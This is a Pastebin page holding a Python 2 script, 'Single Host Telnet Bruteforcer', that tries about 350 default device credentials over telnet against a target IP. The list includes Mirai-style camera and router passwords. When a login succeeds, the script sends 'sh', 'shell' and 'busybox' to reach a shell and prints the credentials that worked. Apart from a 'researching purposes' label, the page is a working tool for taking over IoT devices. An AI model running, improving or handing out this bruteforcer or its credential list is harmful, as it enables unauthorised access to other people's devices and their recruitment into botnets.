Advertisement
LNO_LiGhT

Single Host Telnet Bruteforcer | By; LiGhT

May 10th, 2017
4,065
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.79 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Single Telnet Host Bruteforcer (For researching purposes) | By; LiGhT
  3. import sys, os, re, time, socket
  4. from threading import Thread
  5.  
  6. if len(sys.argv) < 2:
  7.     print "Usage: python "+sys.argv[0]+" <ip>"
  8.     sys.exit()
  9.  
  10. combo = [
  11.     "Admin:123456",
  12.     "admin:admin",
  13.     "admin:123456",
  14.     "root:camera",
  15.     "Admin:1234",
  16.     "admin:fliradmin",
  17.     "admin:1234",
  18.     "admin:jvc",
  19.     "root:admin",
  20.     "root:Admin",
  21.     "admin:meinsma",
  22.     "admin:1111111",
  23.     "admin:4321",
  24.     "admin:password",
  25.     "root:ikwd",
  26.     "admin:wbox",
  27.     "supervisor:supervisor",
  28.     "dm3500:merlin",
  29.     "ubnt:ubnt",
  30.     "none:backdoor",
  31.     "device:device",
  32.     "apc:apc",
  33.     "none:atc123",
  34.     "(none):public",
  35.     "none:password",
  36.     "scout:scout",
  37.     "none:admin",
  38.     "root:ascend",
  39.     "none:ascend",
  40.     "admin:epicrouter",
  41.     "customer:none",
  42.     "operator:1234User",
  43.     "Service:5678Service",
  44.     "admin:atlantis",
  45.     "root:ROOT500",
  46.     "manuf:xxyyzz",
  47.     "diag:danger",
  48.     "craft:crftpw",
  49.     "root:cms500",
  50.     "Administrator:ggdaseuaimhrke",
  51.     "root:ggdaseuaimhrke",
  52.     "root:tslinux",
  53.     "root:pass",
  54.     "none:NetICs",
  55.     "security:security",
  56.     "manager:friend",
  57.     "manager:manager",
  58.     "admin:bintec",
  59.     "admin:articon",
  60.     "patrol:patrol",
  61.     "service:service",
  62.     "tech:tech",
  63.     "live:live",
  64.     "none:Master",
  65.     "none:laflaf",
  66.     "none:Helpdesk",
  67.     "none:Super",
  68.     "installer:installer",
  69.     "root:fivranne",
  70.     "webadmin:webadmin",
  71.     "user:password",
  72.     "root:Serv4EMC",
  73.     "admin:access",
  74.     "admin:netadmin",
  75.     "mediator:mediator",
  76.     "root:Mau'dib",
  77.     "cellit:cellit",
  78.     "admin:diamond",
  79.     "admin:1234admin",
  80.     "Adminstrator:changeme",
  81.     "netrangr:attack",
  82.     "cmaker:cmaker",
  83.     "admin:changeme",
  84.     "bbsd-client:changeme2database",
  85.     "bbsd-client:NULL",
  86.     "root:attack",
  87.     "admin:default",
  88.     "Cisco:Cisco",
  89.     "admin:cisco",
  90.     "root:blender",
  91.     "hsa:hsasdb",
  92.     "wlse:wlsedb",
  93.     "wlseuser:wlsepassword",
  94.     "root:password",
  95.     "citel:password",
  96.     "admin:system",
  97.     "epicrouter:admin",
  98.     "cgadmin:cgadmin",
  99.     "super:surt",
  100.     "root:tini",
  101.     "anonymous:any@",
  102.     "root:davox",
  103.     "davox:davox",
  104.     "root:calvin",
  105.     "admin:my_DEMARC",
  106.     "MDaemon:MServer",
  107.     "PBX:PBX",
  108.     "NETWORK:NETWORK",
  109.     "none:BRIDGE",
  110.     "admin:michaelangelo",
  111.     "Alphanetworks:wrgg15_di524",
  112.     "Alphanetworks:firmware",
  113.     "draytek:1234Admin",
  114.     "edimax:software01",
  115.     "admin:Administration",
  116.     "admin:su@psir",
  117.     "login:admin",
  118.     "login:password",
  119.     "none:4getme2",
  120.     "tiger:tiger123",
  121.     "MD110:help",
  122.     "admin:extendnet",
  123.     "anonymous:Exabyte",
  124.     "root:default",
  125.     "none:Posterie",
  126.     "manage:!manage",
  127.     "admin:radius",
  128.     "netadmin:nimdaten",
  129.     "admin:isee",
  130.     "Factory:56789Admin",
  131.     "storwatch:specialist",
  132.     "vt100:public",
  133.     "superadmin:secret",
  134.     "hscroot:abc123",
  135.     "admin:P@55w0rd!",
  136.     "root:iDirect",
  137.     "Administrator:pilou",
  138.     "setup:setup",
  139.     "admin:hello",
  140.     "admin:adslroot",
  141.     "admin:administrator",
  142.     "susAdmin:Administrator",
  143.     "none:0Admin",
  144.     "admin:123Admin",
  145.     "admin:123456Admin",
  146.     "superuser:123456",
  147.     "superuser:123456special",
  148.     "superuser:superuser",
  149.     "none:admin00",
  150.     "root:orion99",
  151.     "user:tivonpw",
  152.     "setup:changeme",
  153.     "admin:Ascend",
  154.     "super:super",
  155.     "readwrite:lucenttech1",
  156.     "admin:AitbISP4eCiG",
  157.     "service:smile",
  158.     "cablecom:router",
  159.     "admin:motorola",
  160.     "sysadm:sysadm:",
  161.     "SYSADM:sysadm",
  162.     "vcr:NetVCR",
  163.     "none:xdfk9874t3",
  164.     "disttech:4tas",
  165.     "maint:maint",
  166.     "m1122:m1122",
  167.     "root:3ep5w2u",
  168.     "maint:ntacdmax",
  169.     "supervisor:PlsChgMe",
  170.     "write:private",
  171.     "admin:smallbusiness",
  172.     "admin:mu",
  173.     "admin:microbusiness",
  174.     "admin:pfsense",
  175.     "admin:superuser",
  176.     "engmode:hawk201",
  177.     "support:h179350",
  178.     "lp:lp",
  179.     "radware:radware",
  180.     "wradmin:trancell",
  181.     "none:Col2ogro2",
  182.     "sysadmin:password",
  183.     "teacher:password",
  184.     "integrator:p1nacate",
  185.     "operator:col1ma",
  186.     "administrator:d1scovery",
  187.     "root:1234User",
  188.     "admin:w2402",
  189.     "admin:Sharp",
  190.     "superuser:admin",
  191.     "poll:tech",
  192.     "eng:engineer",
  193.     "Administrator:ganteng",
  194.     "none:smcadmin",
  195.     "Administrator:smcadmin",
  196.     "smc:smcadmin",
  197.     "admin:smcadmin",
  198.     "admin:barricade",
  199.     "cusadmin:highspeed",
  200.     "mso:w0rkplac3rul3s",
  201.     "stratacom:stratauser",
  202.     "Symbol:Admin",
  203.     "target:password",
  204.     "sweex:mysweex",
  205.     "admin:symbol",
  206.     "operator:mercury",
  207.     "guest:truetime",
  208.     "admin:12345Admin",
  209.     "super.super:master",
  210.     "xbox:xbox",
  211.     "tellabs:tellabs#1",
  212.     "root:admin_1",
  213.     "superman:talent",
  214.     "Admin:123456Admin",
  215.     "admin:imss7.0",
  216.     "admin:detmond",
  217.     "admin:1111Admin",
  218.     "admin:22222Admin",
  219.     "admin:x-admin",
  220.     "11111:x-admin",
  221.     "diag:switch",
  222.     "admin:switch",
  223.     "admin:zoomadsl",
  224.     "ADSL:expert03",
  225.     "root:anko",
  226.     "root:oelinux123",
  227.     "root:alpine",
  228.     "root:maxided",
  229.     "pi:raspberry",
  230.     "vagrant:vagrant",
  231.     "telnet:telnet",
  232.     "root:zlxx.",
  233.     "root:juantech",
  234.     "root:avtech",
  235.     "root:vizxv",
  236.     "root:xc3511",
  237.     "guest:xc3511",
  238.     "666666:666666",
  239.     "888888:888888",
  240.     "111111:111111",
  241.     "admin:bayandsl",
  242.     "adminpldt:12345676890",
  243.     "root:1234567890",
  244.     "telecomadmin:admintelecom",
  245.     "admintelecom:telecomadmin",
  246.     "root:comcom",
  247.     "root:zte9x15",
  248.     "ZXDSL:ZXDSL",
  249.     "root:Zte521",
  250.     "D-Link:D-Link",
  251.     "dlink:dlink",
  252.     "DLink:DLink",
  253.     "ftpuser:asteriskftp",
  254.     "root:dreambox",
  255.     "root:1111",
  256.     "root:1234",
  257.     "root:12345",
  258.     "root:123456",
  259.     "root:54321",
  260.     "root:666666",
  261.     "mother:fucker",
  262.     "admin1:password",
  263.     "admin:7ujMko0admin",
  264.     "admin:7ujMko0vizxv",
  265.     "root:7ujMko0admin",
  266.     "root:7ujMko0vizxv",
  267.     "root:hi3518",
  268.     "root:klv123",
  269.     "root:klv1234",
  270.     "root:system",
  271.     "root:realtek",
  272.     "root:jvbzd",
  273.     "root:xmhdipc",
  274.     "openlgtv:openlgtv",
  275.     "root:root123",
  276.     "root:ahetzip8",
  277.     "root:696969",
  278.     "root:pa55w0rd",
  279.     "root:123123",
  280.     "root:b120root",
  281.     "root:PASSWORD",
  282.     "admin:ADMIN",
  283.     "ADMIN:ADMIN",
  284.     "netgear:netgear",
  285.     "ibm:password",
  286.     "vyatta:vyatta",
  287.     "Admin:atc456",
  288.     "micros:micros",
  289.     "comcast:comcast",
  290.     "pos:pos",
  291.     "www:www",
  292.     "2800:2800",
  293.     "UBNT:UBNT",
  294.     "netman:",
  295.     "aDMIN:1111",
  296.     "aDMIN:123456",
  297.     "admin:54321",
  298.     "root:00000000",
  299.     "root:user",
  300.     "root:ikwb",
  301.     "root:changeme",
  302.     "Administrator:",
  303.     "administrator:1234",
  304.     "root:ubnt",
  305.     "Administrator:public",
  306.     "Administrator:buh",
  307.     "Administrator:admin",
  308.     "admin:utstar",
  309.     "admin:99999999",
  310.     "admin:Meins",
  311.     "admin:JVC",
  312.     "admin:admin00",
  313.     "admin:ip20",
  314.     "admin:ip3000",
  315.     "admin:ip400",
  316.     "admin:tsunami",
  317.     "admin:public",
  318.     "admin:2601hx",
  319.     "admin:synnet",
  320.     "quser:quser",
  321.     "tech:",
  322.     "Manager:",
  323.     "Manager:Manager",
  324.     " :ascend",
  325.     "ascend:ascend",
  326.     "dlink:default",
  327.     "login:user",
  328.     "login:pass",
  329.     "!root:",
  330.     "netopia:netopia",
  331.     "sysadm:sysadm",
  332.     "sysadm:anicust",
  333.     "debug:d.e.b.u.g",
  334.     "debug:synnet",
  335.     "echo:echo",
  336.     "daemon:daemon",
  337.     "demo:demo",
  338.     "arris:admin",
  339.     "Linksys:admin",
  340.     "client:client",
  341.     "cisco:CISCO",
  342.     "7654321:7654321",
  343.     "adsl:adsl1234",
  344.     "root:toor",
  345.     "dm:telnet",
  346.     " :netadmin",
  347.     " :hewlpack",
  348.     " :NetICs",
  349.     "adminttd:adminttd",
  350.     "PlcmSpIp:PlcmSpIp",
  351.     "11111111:11111111",
  352.     "22222222:22222222",
  353.     "mountsys:mountsys",
  354.     "memotec:supervisor",
  355.     "root:LSiuY7pOmZG2s",
  356.     "Admin:3UJUh2VemEfUte",
  357.     "museadmin:Muse!Admin",
  358.     "adminpldt:1234567890",
  359.     "pldtadmin:1234567890",
  360.     "bbsd-client:changeme2"
  361. ]
  362.  
  363. def readUntil(tn, string, timeout=8):
  364.     buf = ''
  365.     start_time = time.time()
  366.     while time.time() - start_time < timeout:
  367.         buf += tn.recv(1024)
  368.         time.sleep(0.01)
  369.         if string in buf: return buf
  370.     raise Exception('TIMEOUT!')
  371.  
  372. ip = sys.argv[1]
  373.    
  374. def rippr(ip,username,password):
  375.     try:
  376.         #print username+" "+password
  377.         tn = socket.socket()
  378.         tn.settimeout(8)
  379.         tn.connect((ip,23))
  380.     except Exception:
  381.         tn.close()
  382.     try:
  383.         hoho = ''
  384.         hoho += readUntil(tn, "ogin:")
  385.         if "ogin" in hoho:
  386.             tn.send(username + "\n")
  387.             time.sleep(0.09)
  388.         else:
  389.             pass
  390.     except Exception:
  391.         tn.close()
  392.     try:
  393.         hoho = ''
  394.         hoho += readUntil(tn, "assword:")
  395.         if "assword" in hoho:
  396.             tn.send(password + "\n")
  397.             time.sleep(1)
  398.         else:
  399.             pass
  400.     except Exception:
  401.         tn.close()
  402.     try:
  403.         prompt = ''
  404.         prompt += tn.recv(40960)
  405.         if "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt or ">" in prompt:
  406.             try:
  407.                 if ">" in prompt:
  408.                     tn.send("cat | sh" + "\n")
  409.                     time.sleep(0.01)
  410.                 success = False
  411.                 timeout = 8
  412.                 data = ["BusyBox", "Built-in"]
  413.                 tn.send("sh" + "\n")
  414.                 time.sleep(0.01)
  415.                 tn.send("shell" + "\n")
  416.                 time.sleep(0.01)
  417.                 tn.send("busybox" + "\r\n")
  418.                 buf = ''
  419.                 start_time = time.time()
  420.                 while time.time() - start_time < timeout:
  421.                     buf += tn.recv(40960)
  422.                     time.sleep(0.01)
  423.                     for info in data:
  424.                         if info in buf and "unrecognized" not in buf:
  425.                             success = True
  426.                             break
  427.             except:
  428.                 pass
  429.         else:
  430.             tn.close()
  431.         if success == True:
  432.             print "Possible: %s | %s:%s"%(ip,username,password)
  433.             tn.close()
  434.             success = False
  435.     except Exception:
  436.         tn.close()
  437.  
  438. for information in combo:
  439.     username = information.split(":")[0]
  440.     password = information.split(":")[1]
  441.     #print "starting thread %s:%s"%(username,password)
  442.     balls = Thread(target=rippr, args=(ip,username,password,))
  443.     balls.start()
  444.     time.sleep(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement